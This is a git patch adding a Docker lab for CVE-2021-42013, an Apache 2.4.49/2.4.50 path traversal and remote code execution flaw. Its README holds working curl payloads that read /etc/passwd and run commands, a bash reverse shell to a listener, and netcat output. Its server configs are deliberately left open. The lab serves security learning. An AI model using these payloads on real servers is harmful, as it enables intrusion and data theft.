From fd42ddd0c9f2c0c88aaa61beaed2a4cf27faa47b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 10 Mar 2023 07:58:21 +0000
Subject: [PATCH 1/4] add cve-2021-42013
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
.../cve-2021-42013-docker-lab-main/README.md | 170 ++++++
.../cgi_mod_enable/Dockerfile | 2 +
.../cgi_mod_enable/httpd.conf | 551 ++++++++++++++++++
.../default_conf/Dockerfile | 2 +
.../default_conf/httpd.conf | 551 ++++++++++++++++++
.../path_traversal.png | Bin 0 -> 101305 bytes
.../path_traversal_vuln.py | 93 +++
.../cve-2021-42013-docker-lab-main/rce.png | Bin 0 -> 40813 bytes
.../cve-2021-42013-docker-lab-main/rce1.py | 96 +++
.../cve-2021-42013-docker-lab-main/rce2.png | Bin 0 -> 33410 bytes
.../cve-2021-42013-docker-lab-main/rce2.py | 111 ++++
11 files changed, 1576 insertions(+)
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/README.md
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/Dockerfile
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/httpd.conf
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/Dockerfile
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/httpd.conf
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/path_traversal.png
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/path_traversal_vuln.py
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/rce.png
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/rce1.py
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/rce2.png
create mode 100644 cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/rce2.py
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/README.md b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/README.md
new file mode 100644
index 00000000..f83883d9
--- /dev/null
+++ b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/README.md
@@ -0,0 +1,170 @@
+# CVE-2021-42013
+## Introduction
+It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions [[1]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013).
+
+## Docker container lab to play/learn with CVE-2021-42013
+
+1. File disclosure vulnerability configuration:
+```bash
+$ docker build -t apache-default default_conf
+$ docker run -dit --name apache-app -p 81:80 apache-default
+```
+
+- Proof of Concept:
+```bash
+$ curl -s --path-as-is "http://172.17.0.2:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+```
+- using `path_traversal_vuln.py`
+```bash
+$ python3 path_traversal_vuln.py -h
+
+ >> CVE-2021-42013 - Path Traversal
+ >> by twseptian
+
+usage: path_traversal_vuln.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -f FILE_READ
+
+CVE-2021-42013 - Path Traversal
+
+optional arguments:
+ -h, --help show this help message and exit
+ -t URL, --target URL Target IP
+ -p TARGET_PORT, --port TARGET_PORT
+ Target port
+ -x PAYLOAD, --execute PAYLOAD
+ Path Traversal Payload
+ -f FILE_READ, --file FILE_READ
+ File to read
+```
+```bash
+$ python3 path_traversal_vuln.py -t 172.17.0.2 -p 80 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65' -f /etc/passwd
+```
+
+
+
+2. Remote Code Execution (CGI enabled) configuration:
+```
+$ docker build -t apache-cgi cgi_mod_enable
+$ docker run -dit --name apache-lab -p 82:80 apache-cgi
+```
+
+- Proof of Concept:
+```bash
+$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+```
+
+- PoC using bash reverse shell
+```bash
+$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"
+```
+
+- netcat output
+```bash
+$ nc -lvnp 4444
+Ncat: Version 7.91 ( https://nmap.org/ncat )
+Ncat: Listening on :::4444
+Ncat: Listening on 0.0.0.0:4444
+Ncat: Connection from 172.17.0.3.
+Ncat: Connection from 172.17.0.3:35660.
+daemon@dcbbed945af7:/bin$ id
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+daemon@dcbbed945af7:/bin$
+```
+-using `rce.py`
+```bash
+$ python3 rce.py -h
+
+ >> CVE-2021-42013 - Remote Code Execution
+ >> by twseptian
+
+usage: rce.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -s SHELL
+
+CVE-2021-42013 - Path Traversal
+
+optional arguments:
+ -h, --help show this help message and exit
+ -t URL, --target URL Target IP
+ -p TARGET_PORT, --port TARGET_PORT
+ Target port
+ -x PAYLOAD, --execute PAYLOAD
+ Path Traversal Payload
+ -s SHELL, --shell SHELL
+ shell
+```
+```bash
+$ python3 rce.py -t 172.17.0.3 -p 80 -x '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65' -s "/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
+```
+- netcat listener
+```bash
+$ nc -lvnp 4444
+listening on [any] 4444 ...
+connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41052
+daemon@82f07f4b32a8:/bin$
+```
+
+
+- using `rce2.py`
+```bash
+$ python3 rce2.py -h
+
+ >> CVE-2021-42013 - Remote Code Execution
+ >> by twseptian
+
+usage: rce2.py [-h] -t URL -p TARGET_PORT -L LOCALHOST -P LOCALPORT -x PAYLOAD
+
+CVE-2021-42013 - Path Traversal
+
+optional arguments:
+ -h, --help show this help message and exit
+ -t URL, --target URL Target IP
+ -p TARGET_PORT, --port TARGET_PORT
+ Target port
+ -L LOCALHOST, --lh LOCALHOST
+ Localhost/Local IP
+ -P LOCALPORT, --lp LOCALPORT
+ Localport
+ -x PAYLOAD, --execute PAYLOAD
+ Path Traversal Payload
+```
+```bash
+$ python3 rce2.py -t 172.17.0.3 -p 80 -L 172.17.0.1 -P 4444 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65'
+
+ >> CVE-2021-42013 - Remote Code Execution
+ >> by twseptian
+
+[!] Payload: .%%32%65/.%%32%65/.%%32%65/.%%32%65
+[*] Setting up a netcat listener
+listening on [any] 4444 ...
+connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41122
+bash: initialize_job_control: no job control in background: Bad file descriptor
+daemon@82f07f4b32a8:/bin$ id
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+daemon@82f07f4b32a8:/bin$
+```
+
+
+
+References
+- [[1] CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013)
+- [[2] Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50406)
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/Dockerfile b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/Dockerfile
new file mode 100644
index 00000000..f2fadc37
--- /dev/null
+++ b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/Dockerfile
@@ -0,0 +1,2 @@
+FROM httpd:2.4.50
+COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/httpd.conf b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/httpd.conf
new file mode 100644
index 00000000..7cb1e0af
--- /dev/null
+++ b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/cgi_mod_enable/httpd.conf
@@ -0,0 +1,551 @@
+# cat httpd.conf
+#
+# This is the main Apache HTTP server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See for detailed information.
+# In particular, see
+#
+# for a discussion of each configuration directive.
+#
+# Do NOT simply read the instructions in here without understanding
+# what they do. They're here only as hints or reminders. If you are unsure
+# consult the online docs. You have been warned.
+#
+# Configuration and logfile names: If the filenames you specify for many
+# of the server's control files begin with "/" (or "drive:/" for Win32), the
+# server will use that explicit path. If the filenames do *not* begin
+# with "/", the value of ServerRoot is prepended -- so "logs/access_log"
+# with ServerRoot set to "/usr/local/apache2" will be interpreted by the
+# server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"
+# will be interpreted as '/logs/access_log'.
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# Do not add a slash at the end of the directory path. If you point
+# ServerRoot at a non-local disk, be sure to specify a local disk on the
+# Mutex directive, if file-based mutexes are used. If you wish to share the
+# same ServerRoot for multiple httpd daemons, you will need to change at
+# least PidFile.
+#
+ServerRoot "/usr/local/apache2"
+
+#
+# Mutex: Allows you to set the mutex mechanism and mutex file directory
+# for individual mutexes, or change the global defaults
+#
+# Uncomment and change the directory if mutexes are file-based and the default
+# mutex file directory is not on a local disk or is not appropriate for some
+# other reason.
+#
+# Mutex default:logs
+
+#
+# Listen: Allows you to bind Apache to specific IP addresses and/or
+# ports, instead of the default. See also the
+# directive.
+#
+# Change this to Listen on specific IP addresses as shown below to
+# prevent Apache from glomming onto all bound IP addresses.
+#
+#Listen 12.34.56.78:80
+Listen 80
+
+#
+# Dynamic Shared Object (DSO) Support
+#
+# To be able to use the functionality of a module which was built as a DSO you
+# have to place corresponding `LoadModule' lines at this location so the
+# directives contained in it are actually available _before_ they are used.
+# Statically compiled modules (those listed by `httpd -l') do not need
+# to be loaded here.
+#
+# Example:
+# LoadModule foo_module modules/mod_foo.so
+#
+LoadModule mpm_event_module modules/mod_mpm_event.so
+#LoadModule mpm_prefork_module modules/mod_mpm_prefork.so
+#LoadModule mpm_worker_module modules/mod_mpm_worker.so
+LoadModule authn_file_module modules/mod_authn_file.so
+#LoadModule authn_dbm_module modules/mod_authn_dbm.so
+#LoadModule authn_anon_module modules/mod_authn_anon.so
+#LoadModule authn_dbd_module modules/mod_authn_dbd.so
+#LoadModule authn_socache_module modules/mod_authn_socache.so
+LoadModule authn_core_module modules/mod_authn_core.so
+LoadModule authz_host_module modules/mod_authz_host.so
+LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
+LoadModule authz_user_module modules/mod_authz_user.so
+#LoadModule authz_dbm_module modules/mod_authz_dbm.so
+#LoadModule authz_owner_module modules/mod_authz_owner.so
+#LoadModule authz_dbd_module modules/mod_authz_dbd.so
+LoadModule authz_core_module modules/mod_authz_core.so
+#LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
+#LoadModule authnz_fcgi_module modules/mod_authnz_fcgi.so
+LoadModule access_compat_module modules/mod_access_compat.so
+LoadModule auth_basic_module modules/mod_auth_basic.so
+#LoadModule auth_form_module modules/mod_auth_form.so
+#LoadModule auth_digest_module modules/mod_auth_digest.so
+#LoadModule allowmethods_module modules/mod_allowmethods.so
+#LoadModule isapi_module modules/mod_isapi.so
+#LoadModule file_cache_module modules/mod_file_cache.so
+#LoadModule cache_module modules/mod_cache.so
+#LoadModule cache_disk_module modules/mod_cache_disk.so
+#LoadModule cache_socache_module modules/mod_cache_socache.so
+#LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
+#LoadModule socache_dbm_module modules/mod_socache_dbm.so
+#LoadModule socache_memcache_module modules/mod_socache_memcache.so
+#LoadModule socache_redis_module modules/mod_socache_redis.so
+#LoadModule watchdog_module modules/mod_watchdog.so
+#LoadModule macro_module modules/mod_macro.so
+#LoadModule dbd_module modules/mod_dbd.so
+#LoadModule bucketeer_module modules/mod_bucketeer.so
+#LoadModule dumpio_module modules/mod_dumpio.so
+#LoadModule echo_module modules/mod_echo.so
+#LoadModule example_hooks_module modules/mod_example_hooks.so
+#LoadModule case_filter_module modules/mod_case_filter.so
+#LoadModule case_filter_in_module modules/mod_case_filter_in.so
+#LoadModule example_ipc_module modules/mod_example_ipc.so
+#LoadModule buffer_module modules/mod_buffer.so
+#LoadModule data_module modules/mod_data.so
+#LoadModule ratelimit_module modules/mod_ratelimit.so
+LoadModule reqtimeout_module modules/mod_reqtimeout.so
+#LoadModule ext_filter_module modules/mod_ext_filter.so
+#LoadModule request_module modules/mod_request.so
+#LoadModule include_module modules/mod_include.so
+LoadModule filter_module modules/mod_filter.so
+#LoadModule reflector_module modules/mod_reflector.so
+#LoadModule substitute_module modules/mod_substitute.so
+#LoadModule sed_module modules/mod_sed.so
+#LoadModule charset_lite_module modules/mod_charset_lite.so
+#LoadModule deflate_module modules/mod_deflate.so
+#LoadModule xml2enc_module modules/mod_xml2enc.so
+#LoadModule proxy_html_module modules/mod_proxy_html.so
+#LoadModule brotli_module modules/mod_brotli.so
+LoadModule mime_module modules/mod_mime.so
+#LoadModule ldap_module modules/mod_ldap.so
+LoadModule log_config_module modules/mod_log_config.so
+#LoadModule log_debug_module modules/mod_log_debug.so
+#LoadModule log_forensic_module modules/mod_log_forensic.so
+#LoadModule logio_module modules/mod_logio.so
+#LoadModule lua_module modules/mod_lua.so
+LoadModule env_module modules/mod_env.so
+#LoadModule mime_magic_module modules/mod_mime_magic.so
+#LoadModule cern_meta_module modules/mod_cern_meta.so
+#LoadModule expires_module modules/mod_expires.so
+LoadModule headers_module modules/mod_headers.so
+#LoadModule ident_module modules/mod_ident.so
+#LoadModule usertrack_module modules/mod_usertrack.so
+#LoadModule unique_id_module modules/mod_unique_id.so
+LoadModule setenvif_module modules/mod_setenvif.so
+LoadModule version_module modules/mod_version.so
+#LoadModule remoteip_module modules/mod_remoteip.so
+#LoadModule proxy_module modules/mod_proxy.so
+#LoadModule proxy_connect_module modules/mod_proxy_connect.so
+#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
+#LoadModule proxy_http_module modules/mod_proxy_http.so
+#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
+#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
+#LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so
+#LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so
+#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
+#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
+#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
+#LoadModule proxy_express_module modules/mod_proxy_express.so
+#LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so
+#LoadModule session_module modules/mod_session.so
+#LoadModule session_cookie_module modules/mod_session_cookie.so
+#LoadModule session_crypto_module modules/mod_session_crypto.so
+#LoadModule session_dbd_module modules/mod_session_dbd.so
+#LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
+#LoadModule slotmem_plain_module modules/mod_slotmem_plain.so
+#LoadModule ssl_module modules/mod_ssl.so
+#LoadModule optional_hook_export_module modules/mod_optional_hook_export.so
+#LoadModule optional_hook_import_module modules/mod_optional_hook_import.so
+#LoadModule optional_fn_import_module modules/mod_optional_fn_import.so
+#LoadModule optional_fn_export_module modules/mod_optional_fn_export.so
+#LoadModule dialup_module modules/mod_dialup.so
+#LoadModule http2_module modules/mod_http2.so
+#LoadModule proxy_http2_module modules/mod_proxy_http2.so
+#LoadModule md_module modules/mod_md.so
+#LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
+#LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so
+#LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
+#LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
+LoadModule unixd_module modules/mod_unixd.so
+#LoadModule heartbeat_module modules/mod_heartbeat.so
+#LoadModule heartmonitor_module modules/mod_heartmonitor.so
+#LoadModule dav_module modules/mod_dav.so
+LoadModule status_module modules/mod_status.so
+LoadModule autoindex_module modules/mod_autoindex.so
+#LoadModule asis_module modules/mod_asis.so
+#LoadModule info_module modules/mod_info.so
+#LoadModule suexec_module modules/mod_suexec.so
+
+ LoadModule cgid_module modules/mod_cgid.so
+
+
+ #LoadModule cgi_module modules/mod_cgi.so
+
+#LoadModule dav_fs_module modules/mod_dav_fs.so
+#LoadModule dav_lock_module modules/mod_dav_lock.so
+#LoadModule vhost_alias_module modules/mod_vhost_alias.so
+#LoadModule negotiation_module modules/mod_negotiation.so
+LoadModule dir_module modules/mod_dir.so
+#LoadModule imagemap_module modules/mod_imagemap.so
+#LoadModule actions_module modules/mod_actions.so
+#LoadModule speling_module modules/mod_speling.so
+#LoadModule userdir_module modules/mod_userdir.so
+LoadModule alias_module modules/mod_alias.so
+#LoadModule rewrite_module modules/mod_rewrite.so
+
+
+#
+# If you wish httpd to run as a different user or group, you must run
+# httpd as root initially and it will switch.
+#
+# User/Group: The name (or #number) of the user/group to run httpd as.
+# It is usually good practice to create a dedicated user and group for
+# running httpd, as with most system services.
+#
+User daemon
+Group daemon
+
+
+
+# 'Main' server configuration
+#
+# The directives in this section set up the values used by the 'main'
+# server, which responds to any requests that aren't handled by a
+# definition. These values also provide defaults for
+# any containers you may define later in the file.
+#
+# All of these directives may appear inside containers,
+# in which case these default settings will be overridden for the
+# virtual host being defined.
+#
+
+#
+# ServerAdmin: Your address, where problems with the server should be
+# e-mailed. This address appears on some server-generated pages, such
+# as error documents. e.g. admin@your-domain.com
+#
+ServerAdmin you@example.com
+
+#
+# ServerName gives the name and port that the server uses to identify itself.
+# This can often be determined automatically, but we recommend you specify
+# it explicitly to prevent problems during startup.
+#
+# If your host doesn't have a registered DNS name, enter its IP address here.
+#
+#ServerName www.example.com:80
+
+#
+# Deny access to the entirety of your server's filesystem. You must
+# explicitly permit access to web content directories in other
+# blocks below.
+#
+
+ AllowOverride none
+ Require all granted
+
+
+#
+# Note that from this point forward you must specifically allow
+# particular features to be enabled - so if something's not working as
+# you might expect, make sure that you have specifically enabled it
+# below.
+#
+
+#
+# DocumentRoot: The directory out of which you will serve your
+# documents. By default, all requests are taken from this directory, but
+# symbolic links and aliases may be used to point to other locations.
+#
+DocumentRoot "/usr/local/apache2/htdocs"
+
+ #
+ # Possible values for the Options directive are "None", "All",
+ # or any combination of:
+ # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
+ #
+ # Note that "MultiViews" must be named *explicitly* --- "Options All"
+ # doesn't give it to you.
+ #
+ # The Options directive is both complicated and important. Please see
+ # http://httpd.apache.org/docs/2.4/mod/core.html#options
+ # for more information.
+ #
+ Options Indexes FollowSymLinks
+
+ #
+ # AllowOverride controls what directives may be placed in .htaccess files.
+ # It can be "All", "None", or any combination of the keywords:
+ # AllowOverride FileInfo AuthConfig Limit
+ #
+ AllowOverride None
+
+ #
+ # Controls who can get stuff from this server.
+ #
+ Require all granted
+
+
+#
+# DirectoryIndex: sets the file that Apache will serve if a directory
+# is requested.
+#
+
+ DirectoryIndex index.html
+
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+#
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog /proc/self/fd/2
+
+#
+# LogLevel: Control the number of messages logged to the error_log.
+# Possible values include: debug, info, notice, warn, error, crit,
+# alert, emerg.
+#
+LogLevel warn
+
+
+ #
+ # The following directives define some format nicknames for use with
+ # a CustomLog directive (see below).
+ #
+ LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
+ LogFormat "%h %l %u %t \"%r\" %>s %b" common
+
+
+ # You need to enable mod_logio.c to use %I and %O
+ LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
+
+
+ #
+ # The location and format of the access logfile (Common Logfile Format).
+ # If you do not define any access logfiles within a
+ # container, they will be logged here. Contrariwise, if you *do*
+ # define per- access logfiles, transactions will be
+ # logged therein and *not* in this file.
+ #
+ CustomLog /proc/self/fd/1 common
+
+ #
+ # If you prefer a logfile with access, agent, and referer information
+ # (Combined Logfile Format) you can use the following directive.
+ #
+ #CustomLog "logs/access_log" combined
+
+
+
+ #
+ # Redirect: Allows you to tell clients about documents that used to
+ # exist in your server's namespace, but do not anymore. The client
+ # will make a new request for the document at its new location.
+ # Example:
+ # Redirect permanent /foo http://www.example.com/bar
+
+ #
+ # Alias: Maps web paths into filesystem paths and is used to
+ # access content that does not live under the DocumentRoot.
+ # Example:
+ # Alias /webpath /full/filesystem/path
+ #
+ # If you include a trailing / on /webpath then the server will
+ # require it to be present in the URL. You will also likely
+ # need to provide a section to allow access to
+ # the filesystem path.
+
+ #
+ # ScriptAlias: This controls which directories contain server scripts.
+ # ScriptAliases are essentially the same as Aliases, except that
+ # documents in the target directory are treated as applications and
+ # run by the server when requested rather than as documents sent to the
+ # client. The same rules about trailing "/" apply to ScriptAlias
+ # directives as to Alias.
+ #
+ ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
+
+
+
+
+ #
+ # ScriptSock: On threaded servers, designate the path to the UNIX
+ # socket used to communicate with the CGI daemon of mod_cgid.
+ #
+ #Scriptsock cgisock
+
+
+#
+# "/usr/local/apache2/cgi-bin" should be changed to whatever your ScriptAliased
+# CGI directory exists, if you have that configured.
+#
+
+ AllowOverride None
+ Options None
+ Require all granted
+
+
+
+ #
+ # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
+ # backend servers which have lingering "httpoxy" defects.
+ # 'Proxy' request header is undefined by the IETF, not listed by IANA
+ #
+ RequestHeader unset Proxy early
+
+
+
+ #
+ # TypesConfig points to the file containing the list of mappings from
+ # filename extension to MIME-type.
+ #
+ TypesConfig conf/mime.types
+
+ #
+ # AddType allows you to add to or override the MIME configuration
+ # file specified in TypesConfig for specific file types.
+ #
+ #AddType application/x-gzip .tgz
+ #
+ # AddEncoding allows you to have certain browsers uncompress
+ # information on the fly. Note: Not all browsers support this.
+ #
+ #AddEncoding x-compress .Z
+ #AddEncoding x-gzip .gz .tgz
+ #
+ # If the AddEncoding directives above are commented-out, then you
+ # probably should define those extensions to indicate media types:
+ #
+ AddType application/x-compress .Z
+ AddType application/x-gzip .gz .tgz
+
+ #
+ # AddHandler allows you to map certain file extensions to "handlers":
+ # actions unrelated to filetype. These can be either built into the server
+ # or added with the Action directive (see below)
+ #
+ # To use CGI scripts outside of ScriptAliased directories:
+ # (You will also need to add "ExecCGI" to the "Options" directive.)
+ #
+ #AddHandler cgi-script .cgi
+
+ # For type maps (negotiated resources):
+ #AddHandler type-map var
+
+ #
+ # Filters allow you to process content before it is sent to the client.
+ #
+ # To parse .shtml files for server-side includes (SSI):
+ # (You will also need to add "Includes" to the "Options" directive.)
+ #
+ #AddType text/html .shtml
+ #AddOutputFilter INCLUDES .shtml
+
+
+#
+# The mod_mime_magic module allows the server to use various hints from the
+# contents of the file itself to determine its type. The MIMEMagicFile
+# directive tells the module where the hint definitions are located.
+#
+#MIMEMagicFile conf/magic
+
+#
+# Customizable error responses come in three flavors:
+# 1) plain text 2) local redirects 3) external redirects
+#
+# Some examples:
+#ErrorDocument 500 "The server made a boo boo."
+#ErrorDocument 404 /missing.html
+#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
+#ErrorDocument 402 http://www.example.com/subscription_info.html
+#
+
+#
+# MaxRanges: Maximum number of Ranges in a request before
+# returning the entire resource, or one of the special
+# values 'default', 'none' or 'unlimited'.
+# Default setting is to accept 200 Ranges.
+#MaxRanges unlimited
+
+#
+# EnableMMAP and EnableSendfile: On systems that support it,
+# memory-mapping or the sendfile syscall may be used to deliver
+# files. This usually improves server performance, but must
+# be turned off when serving from networked-mounted
+# filesystems or if support for these functions is otherwise
+# broken on your system.
+# Defaults: EnableMMAP On, EnableSendfile Off
+#
+#EnableMMAP off
+#EnableSendfile on
+
+# Supplemental configuration
+#
+# The configuration files in the conf/extra/ directory can be
+# included to add extra features or to modify the default configuration of
+# the server, or you may simply copy their contents here and change as
+# necessary.
+
+# Server-pool management (MPM specific)
+#Include conf/extra/httpd-mpm.conf
+
+# Multi-language error messages
+#Include conf/extra/httpd-multilang-errordoc.conf
+
+# Fancy directory listings
+#Include conf/extra/httpd-autoindex.conf
+
+# Language settings
+#Include conf/extra/httpd-languages.conf
+
+# User home directories
+#Include conf/extra/httpd-userdir.conf
+
+# Real-time info on requests and configuration
+#Include conf/extra/httpd-info.conf
+
+# Virtual hosts
+#Include conf/extra/httpd-vhosts.conf
+
+# Local access to the Apache HTTP Server Manual
+#Include conf/extra/httpd-manual.conf
+
+# Distributed authoring and versioning (WebDAV)
+#Include conf/extra/httpd-dav.conf
+
+# Various default settings
+#Include conf/extra/httpd-default.conf
+
+# Configure mod_proxy_html to understand HTML4/XHTML1
+
+Include conf/extra/proxy-html.conf
+
+
+# Secure (SSL/TLS) connections
+#Include conf/extra/httpd-ssl.conf
+#
+# Note: The following must must be present to support
+# starting without SSL on platforms with no /dev/random equivalent
+# but a statically compiled-in mod_ssl.
+#
+
+SSLRandomSeed startup builtin
+SSLRandomSeed connect builtin
+
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/Dockerfile b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/Dockerfile
new file mode 100644
index 00000000..f2fadc37
--- /dev/null
+++ b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/Dockerfile
@@ -0,0 +1,2 @@
+FROM httpd:2.4.50
+COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/httpd.conf b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/httpd.conf
new file mode 100644
index 00000000..fc04c9c5
--- /dev/null
+++ b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/default_conf/httpd.conf
@@ -0,0 +1,551 @@
+# cat httpd.conf
+#
+# This is the main Apache HTTP server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See for detailed information.
+# In particular, see
+#
+# for a discussion of each configuration directive.
+#
+# Do NOT simply read the instructions in here without understanding
+# what they do. They're here only as hints or reminders. If you are unsure
+# consult the online docs. You have been warned.
+#
+# Configuration and logfile names: If the filenames you specify for many
+# of the server's control files begin with "/" (or "drive:/" for Win32), the
+# server will use that explicit path. If the filenames do *not* begin
+# with "/", the value of ServerRoot is prepended -- so "logs/access_log"
+# with ServerRoot set to "/usr/local/apache2" will be interpreted by the
+# server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"
+# will be interpreted as '/logs/access_log'.
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# Do not add a slash at the end of the directory path. If you point
+# ServerRoot at a non-local disk, be sure to specify a local disk on the
+# Mutex directive, if file-based mutexes are used. If you wish to share the
+# same ServerRoot for multiple httpd daemons, you will need to change at
+# least PidFile.
+#
+ServerRoot "/usr/local/apache2"
+
+#
+# Mutex: Allows you to set the mutex mechanism and mutex file directory
+# for individual mutexes, or change the global defaults
+#
+# Uncomment and change the directory if mutexes are file-based and the default
+# mutex file directory is not on a local disk or is not appropriate for some
+# other reason.
+#
+# Mutex default:logs
+
+#
+# Listen: Allows you to bind Apache to specific IP addresses and/or
+# ports, instead of the default. See also the
